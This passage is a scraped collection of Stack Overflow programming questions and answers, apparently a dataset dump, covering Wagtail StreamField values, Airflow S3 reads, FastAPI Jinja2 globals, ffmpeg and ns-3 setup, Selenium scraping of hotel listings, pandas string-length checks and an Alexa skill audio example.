Wagtail - How to set rich text value in nested block (StreamField->StructBlock->RichTextBlock)
I have the following structure:
`class ParagraphWithRelatedLinkBlock(blocks.StructBlock):
text = blocks.RichTextBlock()
related_link = blocks.ListBlock(blocks.URLBlock())
class BlogPageSF(Page):
body = StreamField(
[
("paragraph", ParagraphWithRelatedLinkBlock(),
], use_json_field=True
)`
I want to set value of 'text' field from script or Django shell (not via the Wagtail admin site).
How can I do that?
I have tried to do the following in shell:
`p = BlogPageSF()
rt = RichTextBlock('Test')
pb = ParagraphWithRelatedLinkBlock()
pb.text = rt
p.body.append(('paragraph', pb))
p.save()`
I expect that 'text' field in ParagraphWithRelatedLinkBlock will have value of 'Test'
But I get error:
AttributeError: 'ParagraphWithRelatedLinkBlock' object has no attribute 'items'
A:
The values you insert into StreamField data should not be instances of the Block class - block instances are only used as part of the stream definition (for example, when you write text = blocks.RichTextBlock(), you're creating an instance of RichTextBlock that forms part of the ParagraphWithRelatedLinkBlock definition).
The correct data types are either simple Python values, such as dict for a StructBlock, or a dedicated value type such as wagtail.rich_text.RichText for a RichTextBlock. So, in the case of ParagraphWithRelatedLinkBlock, you need to supply a dict containing a RichText value:
from wagtail.rich_text import RichText
p = BlogPageSF()
p.body.append(('paragraph', {'text': RichText('Test')}))
p.save()
| Wagtail - How to set rich text value in nested block (StreamField->StructBlock->RichTextBlock) | I have the following structure:
`class ParagraphWithRelatedLinkBlock(blocks.StructBlock):
text = blocks.RichTextBlock()
related_link = blocks.ListBlock(blocks.URLBlock())
class BlogPageSF(Page):
body = StreamField(
[
("paragraph", ParagraphWithRelatedLinkBlock(),
], use_json_field=True
)`
I want to set value of 'text' field from script or Django shell (not via the Wagtail admin site).
How can I do that?
I have tried to do the following in shell:
`p = BlogPageSF()
rt = RichTextBlock('Test')
pb = ParagraphWithRelatedLinkBlock()
pb.text = rt
p.body.append(('paragraph', pb))
p.save()`
I expect that 'text' field in ParagraphWithRelatedLinkBlock will have value of 'Test'
But I get error:
AttributeError: 'ParagraphWithRelatedLinkBlock' object has no attribute 'items'
| [
"The values you insert into StreamField data should not be instances of the Block class - block instances are only used as part of the stream definition (for example, when you write text = blocks.RichTextBlock(), you're creating an instance of RichTextBlock that forms part of the ParagraphWithRelatedLinkBlock definition).\nThe correct data types are either simple Python values, such as dict for a StructBlock, or a dedicated value type such as wagtail.rich_text.RichText for a RichTextBlock. So, in the case of ParagraphWithRelatedLinkBlock, you need to supply a dict containing a RichText value:\nfrom wagtail.rich_text import RichText\n\np = BlogPageSF()\np.body.append(('paragraph', {'text': RichText('Test')}))\np.save()\n\n"
] | [
0
] | [] | [] | [
"django",
"python",
"wagtail"
] | stackoverflow_0074601679_django_python_wagtail.txt |
Q:
Python::Not reading data correctly from the file in S3
Requirement: To read data from S3 to pass into API
Error: "error": {"code": "ModelStateInvalid", "message": "The request has exceeded the maximum number of validation errors.", "target": "HttpRequest"
When I pass data directly in the code as below document , it works fine as below
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = {'addresses': {'SingleLocation': {'city': 'ABC',
'country': 'US',
'line1': 'Main',
'postalCode': '00000',
'region': 'CA'
}
},
'commit': False,
}
response = client.cr_transc(document)
jsn = response.json()
But when tried having data in the file in the s3 and read it from s3 , it throws into error
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = data_from_s3()
response = client.cr_transc(document)
jsn = response.json()
def data_from_s3(self):
s3 = S3Hook()
data = s3.read_key(bucket_name = self.bucket_name, key = self.data_key)
return data
Below link is for read_key method in airflow
https://airflow.apache.org/docs/apache-airflow/1.10.6/_modules/airflow/hooks/S3_hook.html#S3Hook:~:text=%5Bdocs%5D%20%20%20%20def-,read_key,-(self%2C
A:
Checking the source code:
def read_key(self, key, bucket_name=None):
"""
Reads a key from S3
:param key: S3 key that will point to the file
:type key: str
:param bucket_name: Name of the bucket in which the file is stored
:type bucket_name: str
"""
obj = self.get_key(key, bucket_name)
return obj.get()['Body'].read().decode('utf-8')
This returns a str. You might need to use the json module to convert it:
import json
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = json.loads(data_from_s3()) # <----- convert here
response = client.cr_transc(document)
jsn = response.json()
def data_from_s3(self):
s3 = S3Hook()
data = s3.read_key(bucket_name = self.bucket_name, key = self.data_key)
return data
| Python::Not reading data correctly from the file in S3 | Requirement: To read data from S3 to pass into API
Error: "error": {"code": "ModelStateInvalid", "message": "The request has exceeded the maximum number of validation errors.", "target": "HttpRequest"
When I pass data directly in the code as below document , it works fine as below
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = {'addresses': {'SingleLocation': {'city': 'ABC',
'country': 'US',
'line1': 'Main',
'postalCode': '00000',
'region': 'CA'
}
},
'commit': False,
}
response = client.cr_transc(document)
jsn = response.json()
But when tried having data in the file in the s3 and read it from s3 , it throws into error
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = data_from_s3()
response = client.cr_transc(document)
jsn = response.json()
def data_from_s3(self):
s3 = S3Hook()
data = s3.read_key(bucket_name = self.bucket_name, key = self.data_key)
return data
Below link is for read_key method in airflow
https://airflow.apache.org/docs/apache-airflow/1.10.6/_modules/airflow/hooks/S3_hook.html#S3Hook:~:text=%5Bdocs%5D%20%20%20%20def-,read_key,-(self%2C
| [
"Checking the source code:\ndef read_key(self, key, bucket_name=None):\n \"\"\"\n Reads a key from S3\n\n :param key: S3 key that will point to the file\n :type key: str\n :param bucket_name: Name of the bucket in which the file is stored\n :type bucket_name: str\n \"\"\"\n\n obj = self.get_key(key, bucket_name)\n return obj.get()['Body'].read().decode('utf-8')\n\n\nThis returns a str. You might need to use the json module to convert it:\nimport json\n\n\ndef create_doc(self,client):\n self.n_docs = int(self.n_docs)\n document = json.loads(data_from_s3()) # <----- convert here\n response = client.cr_transc(document) \n jsn = response.json()\n\ndef data_from_s3(self):\n s3 = S3Hook()\n data = s3.read_key(bucket_name = self.bucket_name, key = self.data_key)\n return data\n\n"
] | [
0
] | [] | [] | [
"python",
"python_3.x"
] | stackoverflow_0074603235_python_python_3.x.txt |
Q:
How to pass Python's time function to Jinja2 template using FastAPI?
I send a time.time() variable t0 to my template from FastAPI, which is the time update was triggered:
return templates.TemplateResponse("jobs.html", {
"request": request, "jobs": sorted(out, key=lambda d: d['id'], reverse=True),
"project_ids": ','.join([str(id) for id in myids]),
"sorted_collumn": 'id',
"filter": filter,
"alljobs":alljobs,
"nrecent": nrecent,
"t0": t0
})
How can I time it at the end of rendering aka:
f"processtime:{time.time()-t0:.2f}sec"
time: {{ import time; time.time()-t0 }}
jinja2.exceptions.TemplateSyntaxError: expected token 'end of print statement', got 'time'
or
time: {{ time.time()-t0 }}
jinja2.exceptions.UndefinedError: 'float object' has no attribute 'time'
A:
Looking at the source code of Starlette (i.e., startlette/templating.py)
You can see the following line:
env.globals["url_for"] = url_for in:
So adding the line:
templates.env.globals["now"] = time.time
before the return template above fixes it, and adding the below to jobs.html template:
time: {{ "{0:0.2f}".format(now()-t0) }} sec
time: 16.01 sec
| How to pass Python's time function to Jinja2 template using FastAPI? | I send a time.time() variable t0 to my template from FastAPI, which is the time update was triggered:
return templates.TemplateResponse("jobs.html", {
"request": request, "jobs": sorted(out, key=lambda d: d['id'], reverse=True),
"project_ids": ','.join([str(id) for id in myids]),
"sorted_collumn": 'id',
"filter": filter,
"alljobs":alljobs,
"nrecent": nrecent,
"t0": t0
})
How can I time it at the end of rendering aka:
f"processtime:{time.time()-t0:.2f}sec"
time: {{ import time; time.time()-t0 }}
jinja2.exceptions.TemplateSyntaxError: expected token 'end of print statement', got 'time'
or
time: {{ time.time()-t0 }}
jinja2.exceptions.UndefinedError: 'float object' has no attribute 'time'
| [
"Looking at the source code of Starlette (i.e., startlette/templating.py)\nYou can see the following line:\nenv.globals[\"url_for\"] = url_for in:\nSo adding the line:\ntemplates.env.globals[\"now\"] = time.time\n\nbefore the return template above fixes it, and adding the below to jobs.html template:\ntime: {{ \"{0:0.2f}\".format(now()-t0) }} sec\ntime: 16.01 sec\n\n"
] | [
1
] | [] | [] | [
"fastapi",
"jinja2",
"python"
] | stackoverflow_0074602664_fastapi_jinja2_python.txt |
Q:
'ffmpeg' is not recognized as an internal or external command,
I have to convert a .TS file to MP4 File and for that I am using subprocess to convert it.
for this I have written a python file.
import subprocess
infile = 'vidl.ts'
subprocess.run(['ffmpeg', '-i', infile, 'out.mp4'])
I have also added ffmpeg to environment variables path.
also when I type ffmpeg in cmd it shows the following
when I try to run the python file it shows me the error ->
'ffmpeg' is not recognized as an internal or external command,
operable program or batch file.
can Anyone help me out to where I am missing anything.
A:
As @tripleee noted in the comment, you need to look into your system PATH setting. If you'd like to try an easier fix, you can try my ffmpeg-downloader package.
Two lines of commands in command window (then close and reopen the python window) should do the job for you:
pip install ffmpeg-downloader
ffdl install --add-path
The --add-path argument adds its FFmpeg directory to your Per-User PATH.
| 'ffmpeg' is not recognized as an internal or external command, | I have to convert a .TS file to MP4 File and for that I am using subprocess to convert it.
for this I have written a python file.
import subprocess
infile = 'vidl.ts'
subprocess.run(['ffmpeg', '-i', infile, 'out.mp4'])
I have also added ffmpeg to environment variables path.
also when I type ffmpeg in cmd it shows the following
when I try to run the python file it shows me the error ->
'ffmpeg' is not recognized as an internal or external command,
operable program or batch file.
can Anyone help me out to where I am missing anything.
| [
"As @tripleee noted in the comment, you need to look into your system PATH setting. If you'd like to try an easier fix, you can try my ffmpeg-downloader package.\nTwo lines of commands in command window (then close and reopen the python window) should do the job for you:\npip install ffmpeg-downloader\n\nffdl install --add-path \n\nThe --add-path argument adds its FFmpeg directory to your Per-User PATH.\n"
] | [
0
] | [] | [] | [
"ffmpeg",
"mp4",
"python",
"videoconverter"
] | stackoverflow_0074598999_ffmpeg_mp4_python_videoconverter.txt |
Q:
BeautifulSoup object looks totally different from what I see in Chrome
I am in my first attempt in scraping react-based dynamic website - Booking.com search result page. I want to collect the current price of specific hotels under the same conditions.
This site was easy to scrape data with simple CSS selector before, but now they changed how to code and every elements what I want is described with "data-testid" attribute and the series of unknown random numbers, as far as I see in Chrome dev tool. Now the code what I wrote before does not work and I need to rewrite.
Yesterday, I got a wisdom from another question that in this case what I see in Chrome developer tool is different from the HTML contents as of Soup object. So I tried printing the whole soup object beforehand to check the actual CSS, then select elements using these CSS class. I also made sure to use selenium to capture js-illustrated date.
At first this looking good, however, the returned soup object was totally different from what I see. For instance, the request URL should return a hotel called "cup of tea ensemble" on the top of the list with the price for 4 adults for 1 night from 2022-12-22 as its specified in the url params, but when looking into the soup object, the hotel does not come in first and most of the parameters I added in the url are ignored.
Does this usually happen when trying to scrape React-based website? If so, how can I avoid this to collect data as what I see in web browser?
I am not sure if this help but I am attaching the current code what I use. Thank you for reading and I appreciate any advice!
from bs4 import BeautifulSoup
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
booking_url = 'https://www.booking.com/searchresults.ja.html?lang=ja&ss=Takayama&dest_id=6411914&dest_type=hotel&checkin=2022-12-22&checkout=2022-12-23&group_adults=4&no_rooms=1&group_children=0&sb_travel_purpose=leisure'
#booking_url = 'https://www.google.co.jp/'
options = Options()
options.add_argument('--headless')
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
driver.get(booking_url)
html = driver.page_source.encode('utf-8')
soup = BeautifulSoup(html, 'html.parser')
print(soup)
A:
The below code is producing the exact output what the browser displayed
import time
from bs4 import BeautifulSoup
import pandas as pd
from selenium.webdriver.chrome.service import Service
from selenium import webdriver
from selenium.webdriver.common.by import By
webdriver_service = Service("./chromedriver") #Your chromedriver path
driver = webdriver.Chrome(service=webdriver_service)
driver.get('https://www.booking.com/searchresults.ja.html?label=gen173nr-1FCAQoggJCDWhvdGVsXzY0MTE5MTRIFVgEaFCIAQGYARW4ARfIAQzYAQHoAQH4AQOIAgGoAgO4AuiOk5wGwAIB0gIkZjkzMzFmMzQtZDk1My00OTNiLThlYmYtOGFhZWM5YTM2OTIx2AIF4AIB&aid=304142&lang=ja&dest_id=6411914&dest_type=hotel&checkin=2022-12-22&checkout=2022-12-23&group_adults=4&no_rooms=1&group_children=0&sb_travel_purpose=leisure&offset=0')
#driver.maximize_window()
time.sleep(5)
soup = BeautifulSoup(driver.page_source,"lxml")
for u in soup.select('div[data-testid="property-card"]'):
title = u.select_one('div[class="fcab3ed991 a23c043802"]').get_text(strip=True)
print(title)
#price = u.select_one('span[class="fcab3ed991 bd73d13072"]').get_text(strip=True)
#print(price)
Output:
cup of tea ensemble
FAV HOTEL TAKAYAMA
ワットホテル&スパ飛騨高山
飛騨高山温泉 高山グリーンホテル
岡田旅館 和楽亭
ザ・町家ホテル高山
旅館あすなろ
IORI STAY
風屋
Tabist 風雪
飛騨高山 本陣平野屋 花兆庵
Thanyaporn Hotel
旅館むら山
cup of tea
つゆくさ
旅館 一の松
龍リゾート&スパ
飛騨高山の宿 本陣平野屋 別館
飛騨牛専門 旅館 清龍
Tomato Takayama Station
民宿 和屋
ビヨンドホテル 高山 セカンド
旅館 岐山
Utatei
ビヨンドホテル高山1s
| BeautifulSoup object looks totally different from what I see in Chrome | I am in my first attempt in scraping react-based dynamic website - Booking.com search result page. I want to collect the current price of specific hotels under the same conditions.
This site was easy to scrape data with simple CSS selector before, but now they changed how to code and every elements what I want is described with "data-testid" attribute and the series of unknown random numbers, as far as I see in Chrome dev tool. Now the code what I wrote before does not work and I need to rewrite.
Yesterday, I got a wisdom from another question that in this case what I see in Chrome developer tool is different from the HTML contents as of Soup object. So I tried printing the whole soup object beforehand to check the actual CSS, then select elements using these CSS class. I also made sure to use selenium to capture js-illustrated date.
At first this looking good, however, the returned soup object was totally different from what I see. For instance, the request URL should return a hotel called "cup of tea ensemble" on the top of the list with the price for 4 adults for 1 night from 2022-12-22 as its specified in the url params, but when looking into the soup object, the hotel does not come in first and most of the parameters I added in the url are ignored.
Does this usually happen when trying to scrape React-based website? If so, how can I avoid this to collect data as what I see in web browser?
I am not sure if this help but I am attaching the current code what I use. Thank you for reading and I appreciate any advice!
from bs4 import BeautifulSoup
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
booking_url = 'https://www.booking.com/searchresults.ja.html?lang=ja&ss=Takayama&dest_id=6411914&dest_type=hotel&checkin=2022-12-22&checkout=2022-12-23&group_adults=4&no_rooms=1&group_children=0&sb_travel_purpose=leisure'
#booking_url = 'https://www.google.co.jp/'
options = Options()
options.add_argument('--headless')
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
driver.get(booking_url)
html = driver.page_source.encode('utf-8')
soup = BeautifulSoup(html, 'html.parser')
print(soup)
| [
"The below code is producing the exact output what the browser displayed\nimport time\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://www.booking.com/searchresults.ja.html?label=gen173nr-1FCAQoggJCDWhvdGVsXzY0MTE5MTRIFVgEaFCIAQGYARW4ARfIAQzYAQHoAQH4AQOIAgGoAgO4AuiOk5wGwAIB0gIkZjkzMzFmMzQtZDk1My00OTNiLThlYmYtOGFhZWM5YTM2OTIx2AIF4AIB&aid=304142&lang=ja&dest_id=6411914&dest_type=hotel&checkin=2022-12-22&checkout=2022-12-23&group_adults=4&no_rooms=1&group_children=0&sb_travel_purpose=leisure&offset=0')\n#driver.maximize_window()\ntime.sleep(5)\n\n\nsoup = BeautifulSoup(driver.page_source,\"lxml\")\nfor u in soup.select('div[data-testid=\"property-card\"]'):\n title = u.select_one('div[class=\"fcab3ed991 a23c043802\"]').get_text(strip=True)\n print(title)\n #price = u.select_one('span[class=\"fcab3ed991 bd73d13072\"]').get_text(strip=True)\n #print(price)\n\nOutput:\ncup of tea ensemble\nFAV HOTEL TAKAYAMA\nワットホテル&スパ飛騨高山\n飛騨高山温泉 高山グリーンホテル\n岡田旅館 和楽亭\nザ・町家ホテル高山\n旅館あすなろ\nIORI STAY\n風屋\nTabist 風雪\n飛騨高山 本陣平野屋 花兆庵\nThanyaporn Hotel\n旅館むら山\ncup of tea\nつゆくさ\n旅館 一の松\n龍リゾート&スパ\n飛騨高山の宿 本陣平野屋 別館\n飛騨牛専門 旅館 清龍\nTomato Takayama Station\n民宿 和屋\nビヨンドホテル 高山 セカンド\n旅館 岐山\nUtatei\nビヨンドホテル高山1s\n\n"
] | [
1
] | [] | [] | [
"beautifulsoup",
"python",
"python_3.x",
"selenium",
"web_scraping"
] | stackoverflow_0074601834_beautifulsoup_python_python_3.x_selenium_web_scraping.txt |
Q:
ns3, Python3 has no module named 'ns'
I am using a virtual box to build network simulator 3(ns3), Ubuntu version: Linux Server 20.04 LTS
the Linux command that I had executed are
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install gcc g++ python python3 -y
sudo apt-get install python3-setuptools git mercurial -y
sudo apt-get install zip unzip
apt-get install cmake libc6-dev libc6-dev-i386 libclang-6.0-dev llvm-6.0-dev automake -y
sudo apt-get install -y python-gi-cairo
sudo apt-get install -y gir1.2-gtk-3.0
sudo apt-get install -y python-dev
sudo apt-get install -y python3-dev
sudo apt-get install -y qt5-default
sudo apt-get install -y python3-pygraphviz
sudo apt install python3-pip
sudo apt-get install -y graphviz libgraphviz-dev
sudo pip3 install pygraphviz --install-option='--include-path=/usr/include/graphviz' --install-option='--library-path=/usr/lib/graphviz'
Then I use the bake to install the ns3 through following this page: install ns3 with bake
although the "bake.py show" tell me that pygraphvix is Missing, but since it is not an essential dependency, so I ignore it and continue build the ns3
after i successfully built the ns3, I follow the instruction here to execute the "./waf shell" command in the folder "/source/ns-3.29"
then I run the command and get the error:
root@ns3simulator:/home/ns3/source/ns-3.29# python3 examples/wireless/mixed-wired-wireless.py
Traceback (most recent call last):
File "examples/wireless/mixed-wired-wireless.py", line 54, in <module>
import ns.applications
ModuleNotFoundError: No module named 'ns'
Could anyone please help me for this?Thanks in advance.
A:
The problem
"import ns.applications"
ModuleNotFoundError: No module named 'ns'
is because there is a problem with the ns-3 installation and it is not able to do python binding itself and you need to manually configure it.
In my case, I have python 2.7 also installed
Go to
-> cd [PATH-to-your-ns3.29]
-> /usr/bin/python2.7 ./waf configure
it will enable the python binding like this
Waf configuration
after this when you can see the python binding enabled you can run your python script without any error.
Hope it helps !!!
A:
./ns3 configure --enable-python-bindings
Then run the python example. The libraries should get built.
Here
| ns3, Python3 has no module named 'ns' | I am using a virtual box to build network simulator 3(ns3), Ubuntu version: Linux Server 20.04 LTS
the Linux command that I had executed are
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install gcc g++ python python3 -y
sudo apt-get install python3-setuptools git mercurial -y
sudo apt-get install zip unzip
apt-get install cmake libc6-dev libc6-dev-i386 libclang-6.0-dev llvm-6.0-dev automake -y
sudo apt-get install -y python-gi-cairo
sudo apt-get install -y gir1.2-gtk-3.0
sudo apt-get install -y python-dev
sudo apt-get install -y python3-dev
sudo apt-get install -y qt5-default
sudo apt-get install -y python3-pygraphviz
sudo apt install python3-pip
sudo apt-get install -y graphviz libgraphviz-dev
sudo pip3 install pygraphviz --install-option='--include-path=/usr/include/graphviz' --install-option='--library-path=/usr/lib/graphviz'
Then I use the bake to install the ns3 through following this page: install ns3 with bake
although the "bake.py show" tell me that pygraphvix is Missing, but since it is not an essential dependency, so I ignore it and continue build the ns3
after i successfully built the ns3, I follow the instruction here to execute the "./waf shell" command in the folder "/source/ns-3.29"
then I run the command and get the error:
root@ns3simulator:/home/ns3/source/ns-3.29# python3 examples/wireless/mixed-wired-wireless.py
Traceback (most recent call last):
File "examples/wireless/mixed-wired-wireless.py", line 54, in <module>
import ns.applications
ModuleNotFoundError: No module named 'ns'
Could anyone please help me for this?Thanks in advance.
| [
"The problem\n\"import ns.applications\"\nModuleNotFoundError: No module named 'ns'\nis because there is a problem with the ns-3 installation and it is not able to do python binding itself and you need to manually configure it.\nIn my case, I have python 2.7 also installed\nGo to \n-> cd [PATH-to-your-ns3.29]\n-> /usr/bin/python2.7 ./waf configure\nit will enable the python binding like this\nWaf configuration \nafter this when you can see the python binding enabled you can run your python script without any error.\nHope it helps !!!\n",
"./ns3 configure --enable-python-bindings\n\nThen run the python example. The libraries should get built.\nHere\n"
] | [
0,
0
] | [] | [] | [
"ns_3",
"python",
"python_3.x",
"ubuntu",
"waf"
] | stackoverflow_0061670851_ns_3_python_python_3.x_ubuntu_waf.txt |
Q:
How can I solve the error "AttributeError: 'bool' object has no attribute 'items'" when I print graphs?
I'm trying to make a program able to print wafermaps and histograms for each value selected.
To achieve that, I've made one button to show the graphics of the next parameter selected from the list.
The histogram is shown as I want for every parameter, but it doesn't work for the wafermap graph and it shows this error.
# NEXT PARAMETER
def next_parameter_analyze(self, data_values):
widgets.cmbCurrentParameter.setCurrentText("")
FileName = widgets.txtDataFile.text()
result_file = ResultFile(FileName)
self.measurements = result_file.get_params(list(self.txtParameters.keys()))
self.actual_parameter=(self.actual_parameter+1)%len(self.txtParameters)
par=list(self.txtParameters.keys())[self.actual_parameter]
widgets.cmbCurrentParameter.setCurrentText(par)
self.data_value = self.txtParameters[par].replace(" ", "\t")
estadistica = StatisticsEstepa(self.actual_parameter,self.measurements[par]["measure"],self.config["estepa"])
self.generate_histogram() #GRAPH WORKING
self.generate_wafermap(data_values) #GRAPH NOT WORKING
data_values is necessary to get the values for every parameter, in the histogram graph is not necessary, and it's defined in another function as:
# Get data values from result_file
for fileName in parameters_file_list:
self.textoParametros[fileName]=""
data_values = result_file.get_data_values(fileName) #HERE
for chip in data_values:
self.textoParametros[fileName]+=str(chip)+"\t"+str(data_values[chip])+"\n"
And the get_data_values function is:
def get_data_values(self, name_param):
# get data values chip + measure for printing in QPlainText
get_values = dict()
for die in self.dies:
for module in self.modules:
for param in self.params_list:
if param == name_param:
measure = self.params[die][module][param] # get measure value
if not die in get_values:
get_values[die] = dict()
get_values[die] = measure
return get_values
A:
Not sure where in your code this comes up but it sounds like you have some variable that is a boolean and you tried to access it like
somebool.items and Python is telling you that somebool has no attribute items
| How can I solve the error "AttributeError: 'bool' object has no attribute 'items'" when I print graphs? | I'm trying to make a program able to print wafermaps and histograms for each value selected.
To achieve that, I've made one button to show the graphics of the next parameter selected from the list.
The histogram is shown as I want for every parameter, but it doesn't work for the wafermap graph and it shows this error.
# NEXT PARAMETER
def next_parameter_analyze(self, data_values):
widgets.cmbCurrentParameter.setCurrentText("")
FileName = widgets.txtDataFile.text()
result_file = ResultFile(FileName)
self.measurements = result_file.get_params(list(self.txtParameters.keys()))
self.actual_parameter=(self.actual_parameter+1)%len(self.txtParameters)
par=list(self.txtParameters.keys())[self.actual_parameter]
widgets.cmbCurrentParameter.setCurrentText(par)
self.data_value = self.txtParameters[par].replace(" ", "\t")
estadistica = StatisticsEstepa(self.actual_parameter,self.measurements[par]["measure"],self.config["estepa"])
self.generate_histogram() #GRAPH WORKING
self.generate_wafermap(data_values) #GRAPH NOT WORKING
data_values is necessary to get the values for every parameter, in the histogram graph is not necessary, and it's defined in another function as:
# Get data values from result_file
for fileName in parameters_file_list:
self.textoParametros[fileName]=""
data_values = result_file.get_data_values(fileName) #HERE
for chip in data_values:
self.textoParametros[fileName]+=str(chip)+"\t"+str(data_values[chip])+"\n"
And the get_data_values function is:
def get_data_values(self, name_param):
# get data values chip + measure for printing in QPlainText
get_values = dict()
for die in self.dies:
for module in self.modules:
for param in self.params_list:
if param == name_param:
measure = self.params[die][module][param] # get measure value
if not die in get_values:
get_values[die] = dict()
get_values[die] = measure
return get_values
| [
"Not sure where in your code this comes up but it sounds like you have some variable that is a boolean and you tried to access it like\nsomebool.items and Python is telling you that somebool has no attribute items\n"
] | [
0
] | [] | [] | [
"boolean",
"graph",
"pyqt",
"pyqt6",
"python"
] | stackoverflow_0074559026_boolean_graph_pyqt_pyqt6_python.txt |
Q:
How would I find the longest string per row in a data frame and print the row number if it exceeds a certain amount
I want to write a program which searches through a data frame and if any of the items in it are above 50 characters long, print the row number and ask if you want to continue through the data frame.
threshold = 50
mask = (df.drop(columns=exclude, errors='ignore')
.apply(lambda s: s.str.len().ge(threshold))
)
out = df.loc[~mask.any(axis=1)]
I tried using this, but I don't want to drop the rows, just print the row numbers where the strings exceed 50
Input:
0 "Robert","20221019161921","London"
1 "Edward","20221019161921","London"
2 "Johnny","20221019161921","London"
3 "Insane string which is way too longggggggggggg","20221019161921","London"
Output:
Row 3 is above the 50-character limit.
I would also like the program to print the specific value or string which is too long.
A:
You can use:
exclude = []
threshold = 30
mask = (df.drop(columns=exclude, errors='ignore')
.apply(lambda s: s.str.len().ge(threshold))
)
s = mask.any(axis=1)
for idx in s[s].index:
print(f'row {idx} is above the {threshold}-character limit.')
s2 = mask.loc[idx]
for string in df.loc[idx, s2.reindex(df.columns, fill_value=False)]:
print(string)
Output:
row 3 is above the 30-character limit.
"Insane string which is way too longggggggggggg","20221019161921","London"
Intermediate s:
0 False
1 False
2 False
3 True
dtype: bool
| How would I find the longest string per row in a data frame and print the row number if it exceeds a certain amount | I want to write a program which searches through a data frame and if any of the items in it are above 50 characters long, print the row number and ask if you want to continue through the data frame.
threshold = 50
mask = (df.drop(columns=exclude, errors='ignore')
.apply(lambda s: s.str.len().ge(threshold))
)
out = df.loc[~mask.any(axis=1)]
I tried using this, but I don't want to drop the rows, just print the row numbers where the strings exceed 50
Input:
0 "Robert","20221019161921","London"
1 "Edward","20221019161921","London"
2 "Johnny","20221019161921","London"
3 "Insane string which is way too longggggggggggg","20221019161921","London"
Output:
Row 3 is above the 50-character limit.
I would also like the program to print the specific value or string which is too long.
| [
"You can use:\nexclude = []\nthreshold = 30\n\nmask = (df.drop(columns=exclude, errors='ignore')\n .apply(lambda s: s.str.len().ge(threshold))\n )\n\ns = mask.any(axis=1)\n\nfor idx in s[s].index:\n print(f'row {idx} is above the {threshold}-character limit.')\n s2 = mask.loc[idx]\n for string in df.loc[idx, s2.reindex(df.columns, fill_value=False)]:\n print(string)\n\nOutput:\nrow 3 is above the 30-character limit.\n\"Insane string which is way too longggggggggggg\",\"20221019161921\",\"London\"\n\nIntermediate s:\n0 False\n1 False\n2 False\n3 True\ndtype: bool\n\n"
] | [
0
] | [] | [] | [
"dataframe",
"pandas",
"python"
] | stackoverflow_0074603152_dataframe_pandas_python.txt |
Q:
Make Alexa Skill play audio
I've tried very hard to figure out how to make my Alexa skill to play audio but I cannot find a solution. I emailed the amazon developer support and they sent me the following code. I would love it if someone could explain to me the logic behind this code. Also, how would I make this code into a fully functional Alexa skill? Thank you.
import logging
import typing
from ask_sdk_core.skill_builder import SkillBuilder
from ask_sdk_core.dispatch_components import (
AbstractRequestHandler, AbstractRequestInterceptor, AbstractExceptionHandler)
import ask_sdk_core.utils as ask_utils
from ask_sdk_core.utils import is_intent_name, is_request_type
from ask_sdk_core.api_client import DefaultApiClient
from ask_sdk_core.skill_builder import SkillBuilder, CustomSkillBuilder
from ask_sdk_core.dispatch_components import AbstractRequestInterceptor
from ask_sdk_core.dispatch_components import AbstractResponseInterceptor
from ask_sdk_model.services.service_exception import ServiceException
if typing.TYPE_CHECKING:
from ask_sdk_core.handler_input import HandlerInput
from ask_sdk_model import Response
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
WELCOME_MESSAGE = "This is Alexa regular speech, followed by the sound effect named Bear Groan Roar <audio src='soundbank://soundlibrary/animals/amzn_sfx_bear_groan_roar_01'/>"
WHAT_DO_YOU_WANT = "What do you want to ask?"
class LaunchRequestHandler(AbstractRequestHandler):
"""Handler for Skill Launch."""
def can_handle(self, handler_input):
# type: (HandlerInput) -> bool
return is_request_type("LaunchRequest")(handler_input)
def handle(self, handler_input):
# type: (HandlerInput) -> Response
return handler_input.response_builder.speak(WELCOME_MESSAGE).ask(WHAT_DO_YOU_WANT).response
sb = CustomSkillBuilder(api_client=DefaultApiClient())
sb.add_request_handler(LaunchRequestHandler())
A:
I understand you are trying to play a streaming music station, if this is the case, this will be implemented using AudioPlayer interface, please find more information on the link below:
https://developer.amazon.com/en-US/docs/alexa/custom-skills/audioplayer-interface-reference.html
There is an AudioPlayer sample skill which actually streams from a radio station already to which you can refer. That can be found here: https://github.com/alexa-samples/skill-sample-nodejs-audio-player , also in python https://github.com/alexa-samples/skill-sample-python-audio-player . You will need to change the url stream and add your own.
Please take into account that the URL you provide in the audioItem.stream.url property must meet these requirements:
https://developer.amazon.com/en-US/docs/alexa/custom-skills/audioplayer-interface-reference.html#audio-stream-requirements
| Make Alexa Skill play audio | I've tried very hard to figure out how to make my Alexa skill to play audio but I cannot find a solution. I emailed the amazon developer support and they sent me the following code. I would love it if someone could explain to me the logic behind this code. Also, how would I make this code into a fully functional Alexa skill? Thank you.
import logging
import typing
from ask_sdk_core.skill_builder import SkillBuilder
from ask_sdk_core.dispatch_components import (
AbstractRequestHandler, AbstractRequestInterceptor, AbstractExceptionHandler)
import ask_sdk_core.utils as ask_utils
from ask_sdk_core.utils import is_intent_name, is_request_type
from ask_sdk_core.api_client import DefaultApiClient
from ask_sdk_core.skill_builder import SkillBuilder, CustomSkillBuilder
from ask_sdk_core.dispatch_components import AbstractRequestInterceptor
from ask_sdk_core.dispatch_components import AbstractResponseInterceptor
from ask_sdk_model.services.service_exception import ServiceException
if typing.TYPE_CHECKING:
from ask_sdk_core.handler_input import HandlerInput
from ask_sdk_model import Response
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
WELCOME_MESSAGE = "This is Alexa regular speech, followed by the sound effect named Bear Groan Roar <audio src='soundbank://soundlibrary/animals/amzn_sfx_bear_groan_roar_01'/>"
WHAT_DO_YOU_WANT = "What do you want to ask?"
class LaunchRequestHandler(AbstractRequestHandler):
